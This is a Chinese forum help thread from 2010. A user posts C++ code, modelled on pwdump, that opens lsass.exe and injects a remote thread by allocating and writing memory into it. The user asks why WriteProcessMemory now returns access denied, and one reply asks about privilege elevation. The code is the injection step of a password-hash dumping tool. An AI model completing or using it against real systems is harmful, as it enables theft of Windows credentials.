-
-
[求助]远程注入Lsass.exe失败的问题?
-
发表于: 2010-6-27 14:51
-
我有个远程注入Lsass.exe的程序,以前是成功的,现在在WriteProcessMemory时提示:拒绝访问。提升了本进程SE_DEBUG_NAME权限,甚至提升了system32权限。部分代码如下:
//暂定线程体大小为4K
const DWORD THREADSIZE=1024*10;
HANDLE lsasshWnd=::OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,
FALSE,
GetLsassPID()); //进程ID
if(lsasshWnd==NULL)
{
printf("打开进程错%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
return;
}
DWORD ReAddr = NULL;
//为远程线程执行体分配内存
void * ThreadAddr=::VirtualAllocEx(lsasshWnd,
0,
THREADSIZE,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if(ThreadAddr==NULL)
{
printf("分配远程进程内存失败%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
return;
}
printf("远程线程地址:%08X\n",ThreadAddr);
DWORD dwOldProtect = 0;
if(!::VirtualProtectEx(lsasshWnd,ThreadAddr,1024*10,PAGE_EXECUTE_READWRITE,&dwOldProtect))
{
printf("VirtualProtectEx失败:d:%s","出错了",GetLastError(),GetErrorCode(GetLastError()));
return;
}
//写线程执行体到远程进程
if(!::WriteProcessMemory(lsasshWnd,ThreadAddr,&ThreadProc,THREADSIZE,0))
{
printf("写远程进程%08X错%d:%s\n",ThreadAddr,GetLastError(),GetErrorCode(GetLastError()));
return;
}
就在这出错了,以前是成功的,是不是XP升级到SP3的原因?这段代码是根据pwdump3还是4写的,忘了。现在LC5也不能注入成功,怎么解决?
//暂定线程体大小为4K
const DWORD THREADSIZE=1024*10;
HANDLE lsasshWnd=::OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,
FALSE,
GetLsassPID()); //进程ID
if(lsasshWnd==NULL)
{
printf("打开进程错%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
return;
}
DWORD ReAddr = NULL;
//为远程线程执行体分配内存
void * ThreadAddr=::VirtualAllocEx(lsasshWnd,
0,
THREADSIZE,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if(ThreadAddr==NULL)
{
printf("分配远程进程内存失败%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
return;
}
printf("远程线程地址:%08X\n",ThreadAddr);
DWORD dwOldProtect = 0;
if(!::VirtualProtectEx(lsasshWnd,ThreadAddr,1024*10,PAGE_EXECUTE_READWRITE,&dwOldProtect))
{
printf("VirtualProtectEx失败:d:%s","出错了",GetLastError(),GetErrorCode(GetLastError()));
return;
}
//写线程执行体到远程进程
if(!::WriteProcessMemory(lsasshWnd,ThreadAddr,&ThreadProc,THREADSIZE,0))
{
printf("写远程进程%08X错%d:%s\n",ThreadAddr,GetLastError(),GetErrorCode(GetLastError()));
return;
}
就在这出错了,以前是成功的,是不是XP升级到SP3的原因?这段代码是根据pwdump3还是4写的,忘了。现在LC5也不能注入成功,怎么解决?
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
提权了没?
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
